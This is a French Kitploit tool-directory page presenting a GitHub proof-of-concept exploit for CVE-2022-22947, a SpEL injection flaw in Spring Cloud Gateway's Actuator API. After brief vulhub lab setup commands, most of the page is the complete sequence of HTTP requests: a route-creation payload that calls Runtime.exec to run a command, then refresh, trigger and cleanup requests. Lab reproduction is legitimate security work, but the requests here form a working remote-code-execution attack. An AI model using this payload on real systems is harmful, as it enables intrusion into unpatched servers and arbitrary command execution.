Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-22947 — Exploit PoC pour CVE-2022-22947 : injection SpEL dans Spring Cloud Gateway permettant l'exécution de commandes à distance via des routes d'API Actuator spécialement conçues. | Kitploit
Outils/GitHubGitHub/greetdawn/cve-2022-22947
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests de Sécurité des APICommandement et Contrôle
GitHubgreetdawn/cve-2022-22947

CVE-2022-22947

Exploit PoC pour CVE-2022-22947 : injection SpEL dans Spring Cloud Gateway permettant l'exécution de commandes à distance via des routes d'API Actuator spécialement conçues.

Voir le dépôt
533il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-22947

Spring Cloud Gateway est une passerelle API de Spring. Dans ses versions 3.1.0 et 3.0.6 et antérieures (incluses), il existe une vulnérabilité d'injection d'expression SpEL. Si un attaquant peut accéder à l'API Actuator, il peut exploiter cette vulnérabilité pour exécuter des commandes arbitraires.

Environnement de vulnérabilité

root@kitploit:~
git clone https://github.com/vulhub/vulhub/blob/master/spring/CVE-2022-22947/docker-compose.yml
docker-compose up -d

Exploitation de la vulnérabilité

Envoyez le paquet de données suivant à l'interface routes :

root@kitploit:~
POST /actuator/gateway/routes/greetdawn HTTP/1.1
Host: 192.168.2.68:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/json
Connection: close
Content-Length: 329

{
  "id": "greetdawn",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"}
  }],
"uri": "http://example.com",
"order": 0
}

image-20220303145822027

Le paquet ci-dessus indique que la nouvelle route a été créée avec succès.

Envoyez ensuite le paquet suivant pour appliquer la route ajoutée et déclencher l'exécution de l'expression SpEL :

root@kitploit:~
POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.2.68:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/json
Connection: close
Content-Length: 329


image-20220303150111513

Demandez la route créée précédemment pour déclencher le code malveillant :

root@kitploit:~
GET /actuator/gateway/routes/greetdawn HTTP/1.1
Host: 192.168.2.68:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/json
Connection: close
Content-Length: 0


image-20220303150238309

Note : supprimez la route suivante

root@kitploit:~
DELETE /actuator/gateway/routes/greetdawn HTTP/1.1
Host: 192.168.2.68:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/json
Connection: close
Content-Length: 0


image-20220303150340287

Télécharger l’outil